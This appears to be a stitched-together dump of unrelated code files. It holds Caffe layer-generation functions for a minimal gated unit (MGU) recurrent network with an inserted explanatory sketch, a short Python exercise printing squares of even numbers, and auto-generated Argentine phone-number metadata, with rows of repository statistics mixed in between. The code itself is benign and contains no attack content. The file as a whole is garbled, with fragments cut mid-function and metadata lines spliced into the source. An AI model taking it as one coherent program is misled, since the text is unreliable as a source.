ss += get_eltwise(name=h[1],bottom=[f[1],ht_hat[1]],top=h[1],typename='PROD')
for i in range(2,seqlength+1):
#get fi = sigm(conv(ht-1) + conv(xt))
ss += get_conv(name=ft_convht_1[i],top=ft_convht_1[i],bottom=h[i-1],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_f_h_w,paramname_b=param_f_h_b)
ss += get_conv(name=ft_convxt[i],top=ft_convxt[i],bottom=x[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_f_x_w,paramname_b=param_f_x_b)
ss += get_eltwise(name=ft_beforeactive[i],top=ft_beforeactive[i],bottom=[ft_convht_1[i],ft_convxt[i]],typename='SUM')
ss += get_active(name=f[i],top=f[i],bottom=ft_beforeactive[i],typename='Sigmoid')
#get hi_hat = tanh(conv(fi.*hi-1) + conv(xi))
ss += get_eltwise(name=ht_hat_ftdotht_1[i],bottom=[f[i],h[i-1]],top=ht_hat_ftdotht_1[i],typename='PROD')
ss += get_conv(name=ht_hat_convftdotht_1[i],top=ht_hat_convftdotht_1[i],bottom=ht_hat_ftdotht_1[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_hat_h_w,paramname_b=param_hat_h_b)
ss += get_conv(name=ht_hat_convxt[i],top=ht_hat_convxt[i],bottom=x[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_hat_x_w,paramname_b=param_hat_x_b)
ss += get_eltwise(name=ht_hat_beforeactive[i],top=ht_hat_beforeactive[i],bottom=[ht_hat_convftdotht_1[i],ht_hat_convxt[i]],typename='SUM')
ss += get_active(name=ht_hat[i],top=ht_hat[i],bottom=ht_hat_beforeactive[i],typename='TanH')
#get hi = (1-fi).*hi-1 + fi.*hi_hat
ss += get_power(name=ht_1_ft[i],top=ht_1_ft[i],bottom=f[i],scale=-1,shift=1,power=1)
ss += get_eltwise(name=ht_1_ft_dotht_1[i],bottom=[ht_1_ft[i],h[i-1]],top=ht_1_ft_dotht_1[i],typename='PROD')
ss += get_eltwise(name=ht_ftdotht_hat[i],bottom=[f[i],ht_hat[i]],top=ht_ftdotht_hat[i],typename='PROD')
ss += get_eltwise(name=h[i],bottom=[ht_1_ft_dotht_1[i],ht_ftdotht_hat[i]],top=h[i],typename='SUM')
ss += get_concat(name=top,top=top,bottom =h[1:] ,concat_dim=0)
#ss += get_conv(name=prefix+'conv_ft_ht-1'+str(i),bottom=top[1],top=prefix+'f1',ksize=ksize,numoutput=numoutput,pad=1,stride=1,paramname_w='',paramname_b='')
return ss
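Per time step, the layers above wire up the MGU recurrence f_t = sigm(conv(h_{t-1}) + conv(x_t)), h_hat_t = tanh(conv(f_t .* h_{t-1}) + conv(x_t)), h_t = (1 - f_t) .* h_{t-1} + f_t .* h_hat_t. A scalar sketch of one step, with illustrative (not learned) weights:

```python
import math

def mgu_step(h_prev, x, w_fh=0.5, w_fx=0.5, w_hh=1.0, w_hx=1.0):
    """One scalar MGU step; the weights are made up for illustration."""
    f = 1.0 / (1.0 + math.exp(-(w_fh * h_prev + w_fx * x)))  # forget gate
    h_hat = math.tanh(w_hh * (f * h_prev) + w_hx * x)        # candidate state
    return (1.0 - f) * h_prev + f * h_hat                    # gated blend

h = 0.0
for x in [0.5, -1.0, 2.0]:
    h = mgu_step(h, x)
```

Because h_t is a convex combination of h_{t-1} and a tanh output, the hidden state stays in (-1, 1).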
def get_MGU2(name='',bottom='',top='',seqlength=0,ksize=3,numoutput=1,shareparam=0):
prefix='MGU_'+name+'_'
ss=''
    name={}  # note: shadows the `name` parameter and is not used below
    for i in range(1,seqlength+1):
        name['f'+str(i)]=prefix+'f'+str(i)
x=[]
h=[]
f=[]
ft_convht_1=[]
ft_convxt=[]
ft_beforeactive=[]
ht_hat=[]
ht_hat_beforeactive=[]
ht_hat_ftdotht_1=[]
ht_hat_convftdotht_1=[]
ht_hat_convxt=[]
#ht_hat_sum=[]
ht_1_ft=[]
ht_1_ft_dotht_1=[]
ht_ftdotht_hat=[]
for i in range(0,seqlength+1):
x.append(prefix+'x'+str(i))
h.append(prefix+'h'+str(i))
f.append(prefix+'f'+str(i))
ft_convht_1.append(prefix+'f'+str(i)+'_convh'+str(i-1))
ft_convxt.append(prefix + 'f'+str(i)+'_convx'+str(i))
ht_hat.append(prefix+'h'+str(i)+'_hat')
ht_hat_ftdotht_1.append(prefix+'h'+str(i)+'_hat_f'+str(i)+'_dot_h'+str(i-1))
ht_hat_convxt.append(prefix+'h'+str(i)+'_hat_convx'+str(i))
ht_1_ft.append(prefix+'h'+str(i)+'_1_f'+str(i))
ht_1_ft_dotht_1.append(prefix+'h'+str(i)+'_1_f'+str(i)+'_dot_h'+str(i-1))
ht_ftdotht_hat.append(prefix+'h'+str(i)+'_f'+str(i)+'_dot_h'+str(i)+'_hat')
ft_beforeactive.append(prefix+'f'+str(i)+'_beforeactive')
ht_hat_beforeactive.append(prefix+'h'+str(i)+'_hat_beforeactive')
ht_hat_convftdotht_1.append(prefix+'h'+str(i)+'_hat_conv_f'+str(i)+'_dot_h'+str(i-1))
slice_point=[i for i in range(1,seqlength)]
param_f_h_w=''
param_f_h_b=''
param_f_x_w=''
param_f_x_b=''
param_hat_h_w=''
param_hat_h_b=''
param_hat_x_w=''
param_hat_x_b=''
if shareparam:
param_f_h_w=prefix+'f_h_w'
param_f_h_b=prefix+'f_h_b'
param_f_x_w=prefix+'f_x_w'
param_f_x_b=prefix+'f_x_b'
param_hat_h_w=prefix+'hat_h_w'
param_hat_h_b=prefix+'hat_h_b'
param_hat_x_w=prefix+'hat_x_w'
param_hat_x_b=prefix+'hat_x_b'
#slice x
ss += get_slice(name=prefix+'slice',bottom=bottom,top=x[1:],slice_point=slice_point,slice_dim=0)
    #note: unlike get_MGU, this loop starts at i=1, so the blob h[0] (prefix+'h0') must already exist in the net (e.g. an initial hidden state)
    for i in range(1,seqlength+1):
#get fi = sigm(conv(ht-1) + conv(xt))
ss += get_conv(name=ft_convht_1[i],top=ft_convht_1[i],bottom=h[i-1],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_f_h_w,paramname_b=param_f_h_b)
ss += get_conv(name=ft_convxt[i],top=ft_convxt[i],bottom=x[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_f_x_w,paramname_b=param_f_x_b)
ss += get_eltwise(name=ft_beforeactive[i],top=ft_beforeactive[i],bottom=[ft_convht_1[i],ft_convxt[i]],typename='SUM')
ss += get_active(name=f[i],top=f[i],bottom=ft_beforeactive[i],typename='Sigmoid')
#get hi_hat = tanh(conv(fi.*hi-1) + conv(xi))
ss += get_eltwise(name=ht_hat_ftdotht_1[i],bottom=[f[i],h[i-1]],top=ht_hat_ftdotht_1[i],typename='PROD')
ss += get_conv(name=ht_hat_convftdotht_1[i],top=ht_hat_convftdotht_1[i],bottom=ht_hat_ftdotht_1[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_hat_h_w,paramname_b=param_hat_h_b)
ss += get_conv(name=ht_hat_convxt[i],top=ht_hat_convxt[i],bottom=x[i],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_hat_x_w,paramname_b=param_hat_x_b)
ss += get_eltwise(name=ht_hat_beforeactive[i],top=ht_hat_beforeactive[i],bottom=[ht_hat_convftdotht_1[i],ht_hat_convxt[i]],typename='SUM')
ss += get_active(name=ht_hat[i],top=ht_hat[i],bottom=ht_hat_beforeactive[i],typename='TanH')
#get hi = (1-fi).*hi-1 + fi.*hi_hat
ss += get_power(name=ht_1_ft[i],top=ht_1_ft[i],bottom=f[i],scale=-1,shift=1,power=1)
ss += get_eltwise(name=ht_1_ft_dotht_1[i],bottom=[ht_1_ft[i],h[i-1]],top=ht_1_ft_dotht_1[i],typename='PROD')
ss += get_eltwise(name=ht_ftdotht_hat[i],bottom=[f[i],ht_hat[i]],top=ht_ftdotht_hat[i],typename='PROD')
ss += get_eltwise(name=h[i],bottom=[ht_1_ft_dotht_1[i],ht_ftdotht_hat[i]],top=h[i],typename='SUM')
ss += get_concat(name=top,top=top,bottom =h[1:] ,concat_dim=0)
#ss += get_conv(name=prefix+'conv_ft_ht-1'+str(i),bottom=top[1],top=prefix+'f1',ksize=ksize,numoutput=numoutput,pad=1,stride=1,paramname_w='',paramname_b='')
return ss
| 32.413242 | 211 | 0.63767 | 4,978 | 28,394 | 3.398152 | 0.032744 | 0.032454 | 0.023942 | 0.030149 | 0.879877 | 0.866162 | 0.856763 | 0.848191 | 0.828328 | 0.803145 | 0 | 0.025155 | 0.119356 | 28,394 | 875 | 212 | 32.450286 | 0.65135 | 0.030887 | 0 | 0.725589 | 0 | 0 | 0.185915 | 0.0008 | 0.031987 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.003367 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1e5a9f22f7c175cddddb991d4c493f778c9f794d | 305 | py | Python | Python/Uri 1073 - Quadrado de Pares.py | Gui25Reis/URI | 3df11b4eb27513b336bdff1e56b7707568b249e3 | [
"MIT"
] | null | null | null | Python/Uri 1073 - Quadrado de Pares.py | Gui25Reis/URI | 3df11b4eb27513b336bdff1e56b7707568b249e3 | [
"MIT"
] | null | null | null | Python/Uri 1073 - Quadrado de Pares.py | Gui25Reis/URI | 3df11b4eb27513b336bdff1e56b7707568b249e3 | [
"MIT"
] | null | null | null | N = int(input())
if N % 2 == 0:
for num_pares in range(2, N+1, 2):
par_quadrado = num_pares**2
print('{}^2 = {}'.format(num_pares, par_quadrado))
else:
for num_pares in range(2, N+1, 2):
par_quadrado = num_pares**2
print('{}^2 = {}'.format(num_pares, par_quadrado)) | 33.888889 | 58 | 0.570492 | 50 | 305 | 3.28 | 0.34 | 0.292683 | 0.134146 | 0.158537 | 0.890244 | 0.890244 | 0.890244 | 0.890244 | 0.890244 | 0.890244 | 0 | 0.052174 | 0.245902 | 305 | 9 | 59 | 33.888889 | 0.66087 | 0 | 0 | 0.666667 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.222222 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
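Both branches of the if/else above are identical — for odd N, range(2, N+1, 2) already stops below N — so a single loop is equivalent. A sketch with a hypothetical helper name:

```python
def quadrado_de_pares(n):
    # Squares of even numbers up to n; works for even and odd n alike.
    return ['{}^2 = {}'.format(i, i ** 2) for i in range(2, n + 1, 2)]

lines = quadrado_de_pares(6)
```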
1e7bf95da7b41cdadd0e1bbb2dee59eda6e4a46e | 11,927 | py | Python | venv/lib/python3.6/site-packages/phonenumbers/data/region_AR.py | exdeam/opencrm | dfdcfdf99f0b42eb3959171927cb6574583f5ee0 | [
"MIT"
] | null | null | null | venv/lib/python3.6/site-packages/phonenumbers/data/region_AR.py | exdeam/opencrm | dfdcfdf99f0b42eb3959171927cb6574583f5ee0 | [
"MIT"
] | null | null | null | venv/lib/python3.6/site-packages/phonenumbers/data/region_AR.py | exdeam/opencrm | dfdcfdf99f0b42eb3959171927cb6574583f5ee0 | [
"MIT"
] | null | null | null | """Auto-generated file, do not edit by hand. AR metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_AR = PhoneMetadata(id='AR', country_code=54, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='(?:11|(?:[2368]|9\\d)\\d)\\d{8}', possible_length=(10, 11), possible_length_local_only=(6, 7, 8)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:(?:11[2-7]|670)\\d\\d|2(?:2(?:0(?:2[4-6]|[45]\\d)|(?:1[2-6]|3[3-6])\\d|2(?:14|[3467][4-6]|[59][45])|4(?:[156][4-6]|[23]4|4[45])|5(?:2[45]|[45][4-6]|7[3-6])|6(?:[145]4|2[2-6]|[6-8][4-6])|7[1-4]4|8(?:1[3-6]|[356]4|4[2-7])|9(?:1[4-6]|[267]4))|3(?:0(?:2[2-6]|4\\d)|1(?:[47][4-6]|64)|2(?:[03][2-6]|4[3-6]|5[4-6]|6[45])|3[13-8]4|4(?:[24][45]|34|5[4-6]|6[3-6])|5(?:[25][4-6]|[346-8]4)|(?:64|7[45])\\d|9(?:2[3-6]|[3-5]4|6[4-6]))|4(?:7(?:3[45]|[48][4-6]|54|7[2-6])|94\\d)|6(?:(?:04|1[2-7]|[36][45])\\d|2(?:2[2-6]|[46]4|5[4-6])|4(?:[45]\\d|6[0-46-9]|[78]4)|5(?:[1568]4|7[2-7]))|80[45]\\d|9(?:0(?:1[3-6]|2[45]|34)|(?:1[4-6]|9[3-6])\\d|2(?:0[2-7]|[1457-9]4|[26][45]|3[3-6])|3(?:[1356]4|2[4-6]|4[45])|4(?:[08]4|2[2-6]|4\\d|5[02-69]|6[45])|5(?:[23]4|4[2-8])|6(?:[23]4|4[3-6]|6[2-7])|7(?:2[45]|[4-6]\\d)|8(?:24|3[2-6]|[45]\\d)))|3(?:3(?:2(?:7[45]|9[3-6])|64\\d|8[2578][4-6])|4(?:0[0-24-9][4-6]|(?:1[2-7]|2[4-6])\\d|3(?:4\\d|5[0-7]|6[1-69]|[78][4-6])|4(?:2[3-6]|[457][4-6]|6[2-6])|5(?:4[0-4679]|[56][024-6]|8[4-6])|6(?:[03-9][4-6]|2[2-6])|7(?:1[3-6]|2[4-6]|6[2-6])|8(?:[27][2-7]|3[4-6]|4\\d|9[2-6])|9(?:[136-8][4-6]|2[2-7]))|5(?:1[2-8]\\d|2(?:[124][4-6]|5[3-6])|3(?:[23][4-6]|[4-6]\\d|7[3-6])|4(?:1[2-6]|[2689][4-6]|[347][3-6])|6(?:[23][4-6]|4[2-6])|7(?:1[3-6]|[2-6][4-6])|8(?:[23][4-6]|[46]\\d|5[013-7]))|6(?:2[45]|44)\\d|7(?:[069][45]\\d|1(?:[15][46]|6[4-6]|8[3-6])|(?:2[15]|3[145]|4[13])[4-6]|5(?:[17][3-6]|[468][4-6]|5[2-7])|7(?:[2-5][4-6]|7[2-8])|8(?:1[46]|[26][4-6]))|8(?:(?:0[45]|1[2-6])\\d|2(?:1[46]|[5-7][4-6])|3(?:[278][4-6]|4\\d|5[124-6])|4(?:[16][46]|[3-5][4-6])|5(?:[34]\\d|5[0-46-9]|6[0-246-9]|[78][4-6])|6(?:[1-378][4-6]|5[2-8]|9[46])|7(?:[24-6]\\d|3[2-6]|7[4-6]|8[2-7])|8(?:[3-5]\\d|6[0-68]|7[4-6]|8[3-6])|9(?:[12][46]|4[4-6]))))\\d{5}', example_number='1123456789', possible_length=(10,), possible_length_local_only=(6, 7, 8)),
mobile=PhoneNumberDesc(national_number_pattern='(?:675\\d\\d|9(?:11[2-7]\\d\\d|2(?:2(?:0(?:2[4-6]|[45]\\d)|(?:1[2-6]|3[3-6])\\d|2(?:14|[3467][4-6]|[59][45])|4(?:[156][4-6]|[23]4|4[45])|5(?:2[45]|[45][4-6]|7[3-6])|6(?:[145]4|2[2-6]|[6-8][4-6])|7[1-4]4|8(?:1[3-6]|[356]4|4[2-7])|9(?:1[4-6]|[267]4))|3(?:0(?:2[2-6]|4\\d)|1(?:[47][4-6]|64)|2(?:[03][2-6]|4[3-6]|5[4-6]|6[45])|3[13-8]4|4(?:[24][45]|34|5[4-6]|6[3-6])|5(?:[25][4-6]|[346-8]4)|(?:64|7[45])\\d|9(?:2[3-6]|[3-5]4|6[4-6]))|4(?:7(?:3[45]|[48][4-6]|54|7[2-6])|94\\d)|6(?:(?:04|1[2-7]|[36][45])\\d|2(?:2[2-6]|[46]4|5[4-6])|4(?:[45]\\d|6[0-46-9]|[78]4)|5(?:[1568]4|7[2-7]))|80[45]\\d|9(?:0(?:1[3-6]|2[45]|34)|(?:1[4-6]|9[3-6])\\d|2(?:0[2-7]|[1457-9]4|[26][45]|3[3-6])|3(?:[1356]4|2[4-6]|4[45])|4(?:[08]4|2[2-6]|4\\d|5[02-69]|6[45])|5(?:[23]4|4[2-8])|6(?:[23]4|4[3-6]|6[2-7])|7(?:2[45]|[4-6]\\d)|8(?:24|3[2-6]|[45]\\d)))|3(?:3(?:2(?:7[45]|9[3-6])|64\\d|8[2578][4-6])|4(?:0[0-24-9][4-6]|(?:1[2-7]|2[4-6])\\d|3(?:4\\d|5[0-7]|6[1-69]|[78][4-6])|4(?:2[3-6]|[457][4-6]|6[2-6])|5(?:4[0-4679]|[56][024-6]|8[4-6])|6(?:[03-9][4-6]|2[2-6])|7(?:1[3-6]|2[4-6]|6[2-6])|8(?:[27][2-7]|3[4-6]|4\\d|9[2-6])|9(?:[136-8][4-6]|2[2-7]))|5(?:1[2-8]\\d|2(?:[124][4-6]|5[3-6])|3(?:[23][4-6]|[4-6]\\d|7[3-6])|4(?:1[2-6]|[2689][4-6]|[347][3-6])|6(?:[23][4-6]|4[2-6])|7(?:1[3-6]|[2-6][4-6])|8(?:[23][4-6]|[46]\\d|5[013-7]))|6(?:2[45]|44)\\d|7(?:[069][45]\\d|1(?:[15][46]|6[4-6]|8[3-6])|(?:2[15]|3[145]|4[13])[4-6]|5(?:[17][3-6]|[468][4-6]|5[2-7])|7(?:[2-5][4-6]|7[2-8])|8(?:1[46]|[26][4-6]))|8(?:(?:0[45]|1[2-6])\\d|2(?:1[46]|[5-7][4-6])|3(?:[278][4-6]|4\\d|5[124-6])|4(?:[16][46]|[3-5][4-6])|5(?:[34]\\d|5[0-46-9]|6[0-246-9]|[78][4-6])|6(?:[1-378][4-6]|5[2-8]|9[46])|7(?:[24-6]\\d|3[2-6]|7[4-6]|8[2-7])|8(?:[3-5]\\d|6[0-68]|7[4-6]|8[3-6])|9(?:[12][46]|4[4-6])))))\\d{5}', example_number='91123456789', possible_length=(10, 11), possible_length_local_only=(6, 7, 8)),
toll_free=PhoneNumberDesc(national_number_pattern='800\\d{7}', example_number='8001234567', possible_length=(10,)),
premium_rate=PhoneNumberDesc(national_number_pattern='60[04579]\\d{7}', example_number='6001234567', possible_length=(10,)),
uan=PhoneNumberDesc(national_number_pattern='810\\d{7}', example_number='8101234567', possible_length=(10,)),
no_international_dialling=PhoneNumberDesc(national_number_pattern='810\\d{7}', possible_length=(10,)),
national_prefix='0',
national_prefix_for_parsing='0?(?:(11|2(?:2(?:02?|[13]|2[13-79]|4[1-6]|5[2457]|6[124-8]|7[1-4]|8[13-6]|9[1267])|3(?:02?|1[467]|2[03-6]|3[13-8]|[49][2-6]|5[2-8]|[67])|4(?:7[3-578]|9)|6(?:[0136]|2[24-6]|4[6-8]?|5[15-8])|80|9(?:0[1-3]|[19]|2\\d|3[1-6]|4[02568]?|5[2-4]|6[2-46]|72?|8[23]?))|3(?:3(?:2[79]|6|8[2578])|4(?:0[0-24-9]|[12]|3[5-8]?|4[24-7]|5[4-68]?|6[02-9]|7[126]|8[2379]?|9[1-36-8])|5(?:1|2[1245]|3[237]?|4[1-46-9]|6[2-4]|7[1-6]|8[2-5]?)|6[24]|7(?:[069]|1[1568]|2[15]|3[145]|4[13]|5[14-8]|7[2-57]|8[126])|8(?:[01]|2[15-7]|3[2578]?|4[13-6]|5[4-8]?|6[1-357-9]|7[36-8]?|8[5-8]?|9[124])))15)?',
national_prefix_transform_rule='9\\1',
number_format=[NumberFormat(pattern='(\\d{3})', format='\\1', leading_digits_pattern=['[019]']),
NumberFormat(pattern='(\\d{2})(\\d{4})', format='\\1-\\2', leading_digits_pattern=['[2-7]|8[0-7]']),
NumberFormat(pattern='(\\d{3})(\\d{4})', format='\\1-\\2', leading_digits_pattern=['[2-7]|8[013-8]']),
NumberFormat(pattern='(\\d{4})(\\d{4})', format='\\1-\\2', leading_digits_pattern=['[2-7]']),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1-\\2-\\3', leading_digits_pattern=['[68]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{2})(\\d{4})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['1'], national_prefix_formatting_rule='0\\1', national_prefix_optional_when_formatting=True),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['2(?:2[013]|3[067]|49|6[01346]|8|9[147-9])|3(?:36|4[1-358]|5[138]|6|7[069]|8[013578])', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4[4-6])|8|9(?:[19]|[48][45]|7[4-6]))|3(?:36|4(?:[12]|[35][4-6]|84)|5(?:1|[38][4-6])|6|7[069]|8(?:[01]|3[45]|[58][3-6]|7[24-6]))', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5[039])|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5[0-47]|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4[0-36-9]|5[013467]|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4[0-35-9]|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28])))', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5(?:[09]|3[016-9]))|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5(?:[0-37]|4[347])|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4(?:[0-37-9]|6[1-9])|5(?:[0137]|4[4-8]|6[0-35-9])|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4(?:[0-37-9]|5[0289]|6[0-7])|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28])))'], national_prefix_formatting_rule='0\\1', national_prefix_optional_when_formatting=True),
NumberFormat(pattern='(\\d{4})(\\d{2})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['[23]'], national_prefix_formatting_rule='0\\1', national_prefix_optional_when_formatting=True),
NumberFormat(pattern='(\\d)(\\d{2})(\\d{4})(\\d{4})', format='\\2 15-\\3-\\4', leading_digits_pattern=['91'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d)(\\d{3})(\\d{3})(\\d{4})', format='\\2 15-\\3-\\4', leading_digits_pattern=['9(?:2[2-4689]|3[3-8])', '9(?:2(?:2[013]|3[067]|49|6[01346]|8|9[147-9])|3(?:36|4[1-358]|5[138]|6|7[069]|8[013578]))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4[4-6])|8|9(?:[19]|[48][45]|7[4-6]))|3(?:36|4(?:[12]|[35][4-6]|84)|5(?:1|[38][4-6])|6|7[069]|8(?:[01]|3[45]|[58][3-6]|7[24-6])))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5[039])|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5[0-47]|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4[0-36-9]|5[013467]|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4[0-35-9]|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28]))))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5(?:[09]|3[016-9]))|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5(?:[0-37]|4[347])|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4(?:[0-37-9]|6[1-9])|5(?:[0137]|4[4-8]|6[0-35-9])|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4(?:[0-37-9]|5[0289]|6[0-7])|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28]))))'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d)(\\d{4})(\\d{2})(\\d{4})', format='\\2 15-\\3-\\4', leading_digits_pattern=['9'], national_prefix_formatting_rule='0\\1')],
intl_number_format=[NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1-\\2-\\3', leading_digits_pattern=['[68]']),
NumberFormat(pattern='(\\d{2})(\\d{4})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['1']),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['2(?:2[013]|3[067]|49|6[01346]|8|9[147-9])|3(?:36|4[1-358]|5[138]|6|7[069]|8[013578])', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4[4-6])|8|9(?:[19]|[48][45]|7[4-6]))|3(?:36|4(?:[12]|[35][4-6]|84)|5(?:1|[38][4-6])|6|7[069]|8(?:[01]|3[45]|[58][3-6]|7[24-6]))', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5[039])|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5[0-47]|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4[0-36-9]|5[013467]|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4[0-35-9]|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28])))', '2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5(?:[09]|3[016-9]))|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5(?:[0-37]|4[347])|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4(?:[0-37-9]|6[1-9])|5(?:[0137]|4[4-8]|6[0-35-9])|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4(?:[0-37-9]|5[0289]|6[0-7])|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28])))']),
NumberFormat(pattern='(\\d{4})(\\d{2})(\\d{4})', format='\\1 \\2-\\3', leading_digits_pattern=['[23]']),
NumberFormat(pattern='(\\d)(\\d{2})(\\d{4})(\\d{4})', format='\\1 \\2 \\3-\\4', leading_digits_pattern=['91']),
NumberFormat(pattern='(\\d)(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3-\\4', leading_digits_pattern=['9(?:2[2-4689]|3[3-8])', '9(?:2(?:2[013]|3[067]|49|6[01346]|8|9[147-9])|3(?:36|4[1-358]|5[138]|6|7[069]|8[013578]))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4[4-6])|8|9(?:[19]|[48][45]|7[4-6]))|3(?:36|4(?:[12]|[35][4-6]|84)|5(?:1|[38][4-6])|6|7[069]|8(?:[01]|3[45]|[58][3-6]|7[24-6])))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5[039])|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5[0-47]|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4[0-36-9]|5[013467]|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4[0-35-9]|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28]))))', '9(?:2(?:2(?:0[45]|[13])|3(?:04|[67])|49|6(?:[0136]|4(?:[45]|6[0-36-9]))|8|9(?:[19]|4(?:4|5(?:[09]|3[016-9]))|7[4-6]|8[45]))|3(?:36|4(?:[12]|3(?:4|5(?:[0-37]|4[347])|6[1-39])|5(?:4[0-379]|[56][02])|84)|5(?:1|3[4-6]|8(?:4(?:[0-37-9]|6[1-9])|5(?:[0137]|4[4-8]|6[0-35-9])|6))|6|7[069]|8(?:[01]|3(?:4|5[12])|5(?:3|4(?:[0-37-9]|5[0289]|6[0-7])|5[0-37-9]|6[0-27-9])|7(?:[245]|6[0-37-9])|8(?:[34]|5[0-37-9]|6[0-28]))))']),
NumberFormat(pattern='(\\d)(\\d{4})(\\d{2})(\\d{4})', format='\\1 \\2 \\3-\\4', leading_digits_pattern=['9'])],
mobile_number_portable_region=True)
